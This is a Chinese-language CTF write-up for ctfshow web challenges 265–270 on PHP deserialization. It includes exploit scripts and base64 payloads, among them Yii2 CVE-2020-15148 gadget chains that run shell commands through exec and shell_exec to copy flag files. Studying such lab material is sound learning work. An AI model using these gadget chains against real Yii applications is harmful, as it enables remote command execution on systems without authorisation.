目录

1、web265

2、web266

3、web267

4、web268

5、web269

6、web270

---

1、web265

很简单的一个判断，满足 $this->token===$this->password; 即可

由于 $ctfshow->token=md5(mt_rand()) 会将 token 随机为一个 md5 值，我们使用 & 绕一下，让两个参数恒等

exp：

<?php
class ctfshowAdmin
{public $token;public $password;public function __construct($t, $p){$this->token = $t;$this->password = $p;}
}$c = new ctfshowAdmin(1,2);
$c->token = &$c->password;
echo serialize($c);
?>

payload：

?ctfshow=O:12:"ctfshowAdmin":2:{s:5:"token";i:2;s:8:"password";R:2;}

拿到 flag：ctfshow{11cbda99-2f50-42bb-89f9-d9b08318d448}

2、web266

__destruct() 在对象被销毁时会自动调用，我们只需要让 ctfshow 类正确被反序列化即可，但是直接传 ctfshow 会被检测，之后就会抛出异常，如果程序报错或者抛出异常就不会触发 __destruct() 了，因为 throw 那个函数回收了自动销毁的类，导致 __destruct() 检测不到有东西销毁，从而也就无法触发 __destruct()。

这里正则匹配大小写敏感，因此可以采用大小写绕过

exp：

<?php
class Ctfshow
{public $username = 'xxxxxx';public $password = 'xxxxxx';
}
$c = new Ctfshow();
echo serialize($c);

payload：

O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

bp 重放或者 raw 模式下使用 hackbar，不然可能没回显

拿到 flag：ctfshow{cd17da6b-75f5-4cfc-b792-39bb72724740}

当然我们可以强行先触发它的 GC 回收来抛出异常，唤醒  __destruct() 魔术方法

触发方式有两种：对象被 unset() 处理时；数组对象为 NULL 时

这里采用第二种方式

exp：

<?phpclass ctfshow
{public $username = 'xxxxxx';public $password = 'xxxxxx';
}
$c = new ctfshow();
$m = array($c,0);
echo serialize($m);

payload：

a:2:{i:0;O:7:"ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}i:1;i:0;}

3、web267

admin/admin 可以登录

提示 get 请求 view-source 

///backdoor/shell
unserialize(base64_decode($_GET['code']))

Yii 的一个 CVE：CVE-2020-15148

用现成的 poc 打：

<?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'exec';	$this->id = 'cat /f* > my6n.txt';}}
}
namespace Faker {use yii\rest\IndexAction;class Generator{protected $formatters;public function __construct(){$this->formatters['close'] = [new IndexAction(), 'run'];}}
}
namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new Generator();}}
}
namespace{use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult()));
}

payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjE4OiJjYXQgL2YqID4gbXk2bi50eHQiO31pOjE7czozOiJydW4iO319fX0

 

访问 my6n.txt 即可看到 flag 

4、web268

上一题的 poc 打不通了，换一个

<?php
namespace yii\rest {class Action{public $checkAccess;}class IndexAction{public function __construct($func, $param){$this->checkAccess = $func;$this->id = $param;}}
}
namespace yii\web {abstract class MultiFieldSession{public $writeCallback;}class DbSession extends MultiFieldSession{public function __construct($func, $param){$this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];}}
}
namespace yii\db {use yii\base\BaseObject;class BatchQueryResult{private $_dataReader;public function __construct($func, $param){$this->_dataReader = new \yii\web\DbSession($func, $param);}}
}
namespace {$exp = new \yii\db\BatchQueryResult('shell_exec', 'cp /f* my6n.txt');echo(base64_encode(serialize($exp)));
}

payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0

拿到 flag：ctfshow{f5b30e4e-16e1-4fb2-ad07-c75c6c069453}

5、web269

同上，payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0

6、web270

payload：

?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czoxMDoic2hlbGxfZXhlYyI7czoyOiJpZCI7czoxNToiY3AgL2YqIG15Nm4udHh0Ijt9aToxO3M6MzoicnVuIjt9fX0